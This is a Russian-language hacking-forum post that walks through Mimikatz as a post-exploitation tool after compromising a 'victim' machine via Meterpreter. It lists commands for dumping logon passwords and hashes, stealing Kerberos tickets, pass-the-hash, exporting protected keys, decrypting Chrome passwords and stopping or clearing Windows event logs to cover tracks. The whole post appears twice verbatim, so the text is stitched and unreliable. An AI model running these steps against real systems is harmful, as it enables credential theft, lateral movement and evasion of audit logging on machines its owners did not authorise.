SooLFaa
03.04.2017, 18:08
Всем привет. Поговорим о небольшом в каком - то смысле, но очень мощном постэксплуатационном фреймворке Mimikatz.
Cсылочка на вики: https://github.com/gentilkiwi/mimikatz/wiki
Ссылочка где ещё почитать: https://adsecurity.org/?page_id=1821#SEKURLSAKerberos
Ссылочка на гит: https://github.com/gentilkiwi/mimikatz
Ссылочка на метасплоит с мимикатзом: https://www.offensive-security.com/metasploit-unleashed/mimikatz/
Ну а я же в вкратце освещу всё, что написано в сие ссылках и добавлю от себя.
Итак, поехали, мы захватили компьютер жертвы с помощью метерпретера и теперь надо пробросить mimikatz. Для этого выполняем команду:
Code:
load mimikatz
В результате получаем следующее...
http://s05.radikal.ru/i178/1704/d5/3c9389cfddd1.png
Открываем help и погнали
http://s019.radikal.ru/i603/1704/c8/1cd96f2fd8f0.png
Видим, что нам доступны некоторые опции (на самом деле это опции из модуля sekurlsa).
Для того чтобы узреть все модули мимикатца, необходимо выполнить команду с любым несуществующим модулем.
Code:
mimikatz_command -f antichat::
http://s019.radikal.ru/i638/1704/d0/0fa7a4106c39.jpg
Чтобы увидеть опции любого модуля выполним же следующую команду(Напоминаю, что пока мы работаем в meterpreter console):
Code:
mimikatz_command -f crypto::
В результате получим список опций этого модуля.
http://s13.radikal.ru/i186/1704/7f/c514033aa3c0.png
Воспользуемся первой из опции и взглянем какие криптопровайдеры установлены на моей машине.
http://s020.radikal.ru/i711/1704/99/3dc5aeb83fd2.png
На этом я закончу смотреть на мимикатц через метерпретер и воспользуемся его бинарной сборкой для удобства описания модулей и практики. Для этого я накатил windows server 2012 с установленными Active Directory и Цербером. Об этом позже, а пока вспомним какие модули есть.
Модули
module ~ crypto (https://github.com/gentilkiwi/mimikatz/wiki/module-~-crypto)– достаточно старый модуль, позволяет ресерчить CryptoApi провайдеры, но сегодня это уже мало что дает.
1) crypto:: providers – вывести список всех криптопровайдеров
2) crypto::stores – вывести все логические хранилища сертификатов в системном окружении
.SpoilerTarget" type="button">Spoiler: Профит
http://s09.radikal.ru/i182/1704/cc/4997ab7f02fa.png
3) crypto::certificates – перечисляет сертификаты и ключи, так же может их экспортировать
.SpoilerTarget" type="button">Spoiler: Профит
http://s013.radikal.ru/i325/1704/fb/806bc0852c5b.png
4) crypto::keys – перечисляет установленные ключи
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i620/1704/15/fb62e83440e8.png
5) crypto::hash – функция говорит сама за себя. Получаем хешики пользователя
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i629/1704/e0/1f788dacb33e.png
6) crypto::capi – делает неэкспортируемые ключи – экспортируемыми
.SpoilerTarget" type="button">Spoiler: Профит
http://s020.radikal.ru/i710/1704/59/a1d2fb3f4583.png
module ~ privilege (https://github.com/gentilkiwi/mimikatz/wiki/module-~-privilege)–модуль для получения определенных прав и повышение привилегий
1)privilege::debug - если у вас не работают некоторые модули выполните эту опцию. Позволяет внедряться в чужие процессы и производить их отладки.
2)privilege::driver – Получить привилегии на загрузку драйверов.
3)privilege::security – Получить привилегии на изменение политики безопасности.
4)privilege::backup – Получаем права на архивирование файлов
5)privilege::restore – Получаем права на восстановление бэкапов
6)privilege::sysenv – Получаем права на управление переменными окружения
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i631/1704/32/5bcb9ba2629f.png
module ~ sekurlsa (https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa) – модуль для хищения паролей, важное условие, модуль работает только от админа и перед ним получить права на debug.
1) sekurlsa::logonpasswords – получить хеши залогиненных пользователей
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i615/1704/7d/d131ec1864c9.png
2) sekurlsa::wdigest – получить хеши залогиненных пользователей (в открытом виде из wdigest)
.SpoilerTarget" type="button">Spoiler: Профит
http://s14.radikal.ru/i187/1704/24/f661d265493d.png
3) sekurlsa::msv – тоже самое + CredentionalKeys
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i622/1704/8f/ddbc54b29456.png
4) sekurlsa::tspkg – сервис для управления фрагментацией реестра, в том числе через него можно получить креды.
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i628/1704/aa/ff44264cc6d7.png
5) sekurlsa::livessp – ещё одна служба, которая позволяет получать креды в открытом виде.
6) sekurlsa:: process – переключиться в LSASS, чтобы снифать пассы.
7) sekurlsa:: pth - – запустить процесс от имени конкретного пользователя, используя его хэш а не пароль, по дефолту cmd.
.SpoilerTarget" type="button">Spoiler: Профит
http://s011.radikal.ru/i315/1704/ca/54a393a8cee8.png
8) sekurlsa::tickets – получить все билеты Цербера
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i627/1704/41/2d1a5d3274a5.png
9) sekurlsa::krbtgt – получить все TGT билеты в текущей сессии
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i602/1704/14/87e076acc4d4.png
10) sekurlsa::dpapisystem – Получить системный расшифрованный ключ
.SpoilerTarget" type="button">Spoiler: Профит
http://s009.radikal.ru/i307/1704/5f/e30a9b8d2e3d.png
module ~ dpapi (https://github.com/gentilkiwi/mimikatz/wiki/module-~-dpapi) – модуль для работы с криптопротоколом DPAPI, идея в том что текст может быть расшифрован только на машине на котором он был зашифрован на основе BLOB объекта и мастер ключа.
1) dpapi::blob – непосредственно BLOB объект позволяет шифровать и дешифровать с помощью алгоритма DPAPI
2) dpapi::chrome – расшифровать пароли GOOGLE CHROME
module ~ event (https://github.com/gentilkiwi/mimikatz/wiki/module-~-event) – модуль для очистки журнала событий
1) event::drop – остановить сервис легирования
2) event::clear - просто очистить логи
.SpoilerTarget" type="button">Spoiler: Профит
http://s020.radikal.ru/i706/1704/85/a3b8ef7a0298.png
Cсылочка на вики: https://github.com/gentilkiwi/mimikatz/wiki
Ссылочка где ещё почитать: https://adsecurity.org/?page_id=1821#SEKURLSAKerberos
Ссылочка на гит: https://github.com/gentilkiwi/mimikatz
Ссылочка на метасплоит с мимикатзом: https://www.offensive-security.com/metasploit-unleashed/mimikatz/
Ну а я же в вкратце освещу всё, что написано в сие ссылках и добавлю от себя.
Итак, поехали, мы захватили компьютер жертвы с помощью метерпретера и теперь надо пробросить mimikatz. Для этого выполняем команду:
Code:
load mimikatz
В результате получаем следующее...
http://s05.radikal.ru/i178/1704/d5/3c9389cfddd1.png
Открываем help и погнали
http://s019.radikal.ru/i603/1704/c8/1cd96f2fd8f0.png
Видим, что нам доступны некоторые опции (на самом деле это опции из модуля sekurlsa).
Для того чтобы узреть все модули мимикатца, необходимо выполнить команду с любым несуществующим модулем.
Code:
mimikatz_command -f antichat::
http://s019.radikal.ru/i638/1704/d0/0fa7a4106c39.jpg
Чтобы увидеть опции любого модуля выполним же следующую команду(Напоминаю, что пока мы работаем в meterpreter console):
Code:
mimikatz_command -f crypto::
В результате получим список опций этого модуля.
http://s13.radikal.ru/i186/1704/7f/c514033aa3c0.png
Воспользуемся первой из опции и взглянем какие криптопровайдеры установлены на моей машине.
http://s020.radikal.ru/i711/1704/99/3dc5aeb83fd2.png
На этом я закончу смотреть на мимикатц через метерпретер и воспользуемся его бинарной сборкой для удобства описания модулей и практики. Для этого я накатил windows server 2012 с установленными Active Directory и Цербером. Об этом позже, а пока вспомним какие модули есть.
Модули
module ~ crypto (https://github.com/gentilkiwi/mimikatz/wiki/module-~-crypto)– достаточно старый модуль, позволяет ресерчить CryptoApi провайдеры, но сегодня это уже мало что дает.
1) crypto:: providers – вывести список всех криптопровайдеров
2) crypto::stores – вывести все логические хранилища сертификатов в системном окружении
.SpoilerTarget" type="button">Spoiler: Профит
http://s09.radikal.ru/i182/1704/cc/4997ab7f02fa.png
3) crypto::certificates – перечисляет сертификаты и ключи, так же может их экспортировать
.SpoilerTarget" type="button">Spoiler: Профит
http://s013.radikal.ru/i325/1704/fb/806bc0852c5b.png
4) crypto::keys – перечисляет установленные ключи
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i620/1704/15/fb62e83440e8.png
5) crypto::hash – функция говорит сама за себя. Получаем хешики пользователя
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i629/1704/e0/1f788dacb33e.png
6) crypto::capi – делает неэкспортируемые ключи – экспортируемыми
.SpoilerTarget" type="button">Spoiler: Профит
http://s020.radikal.ru/i710/1704/59/a1d2fb3f4583.png
module ~ privilege (https://github.com/gentilkiwi/mimikatz/wiki/module-~-privilege)–модуль для получения определенных прав и повышение привилегий
1)privilege::debug - если у вас не работают некоторые модули выполните эту опцию. Позволяет внедряться в чужие процессы и производить их отладки.
2)privilege::driver – Получить привилегии на загрузку драйверов.
3)privilege::security – Получить привилегии на изменение политики безопасности.
4)privilege::backup – Получаем права на архивирование файлов
5)privilege::restore – Получаем права на восстановление бэкапов
6)privilege::sysenv – Получаем права на управление переменными окружения
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i631/1704/32/5bcb9ba2629f.png
module ~ sekurlsa (https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa) – модуль для хищения паролей, важное условие, модуль работает только от админа и перед ним получить права на debug.
1) sekurlsa::logonpasswords – получить хеши залогиненных пользователей
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i615/1704/7d/d131ec1864c9.png
2) sekurlsa::wdigest – получить хеши залогиненных пользователей (в открытом виде из wdigest)
.SpoilerTarget" type="button">Spoiler: Профит
http://s14.radikal.ru/i187/1704/24/f661d265493d.png
3) sekurlsa::msv – тоже самое + CredentionalKeys
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i622/1704/8f/ddbc54b29456.png
4) sekurlsa::tspkg – сервис для управления фрагментацией реестра, в том числе через него можно получить креды.
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i628/1704/aa/ff44264cc6d7.png
5) sekurlsa::livessp – ещё одна служба, которая позволяет получать креды в открытом виде.
6) sekurlsa:: process – переключиться в LSASS, чтобы снифать пассы.
7) sekurlsa:: pth - – запустить процесс от имени конкретного пользователя, используя его хэш а не пароль, по дефолту cmd.
.SpoilerTarget" type="button">Spoiler: Профит
http://s011.radikal.ru/i315/1704/ca/54a393a8cee8.png
8) sekurlsa::tickets – получить все билеты Цербера
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i627/1704/41/2d1a5d3274a5.png
9) sekurlsa::krbtgt – получить все TGT билеты в текущей сессии
.SpoilerTarget" type="button">Spoiler: Профит
http://s019.radikal.ru/i602/1704/14/87e076acc4d4.png
10) sekurlsa::dpapisystem – Получить системный расшифрованный ключ
.SpoilerTarget" type="button">Spoiler: Профит
http://s009.radikal.ru/i307/1704/5f/e30a9b8d2e3d.png
module ~ dpapi (https://github.com/gentilkiwi/mimikatz/wiki/module-~-dpapi) – модуль для работы с криптопротоколом DPAPI, идея в том что текст может быть расшифрован только на машине на котором он был зашифрован на основе BLOB объекта и мастер ключа.
1) dpapi::blob – непосредственно BLOB объект позволяет шифровать и дешифровать с помощью алгоритма DPAPI
2) dpapi::chrome – расшифровать пароли GOOGLE CHROME
module ~ event (https://github.com/gentilkiwi/mimikatz/wiki/module-~-event) – модуль для очистки журнала событий
1) event::drop – остановить сервис легирования
2) event::clear - просто очистить логи
.SpoilerTarget" type="button">Spoiler: Профит
http://s020.radikal.ru/i706/1704/85/a3b8ef7a0298.png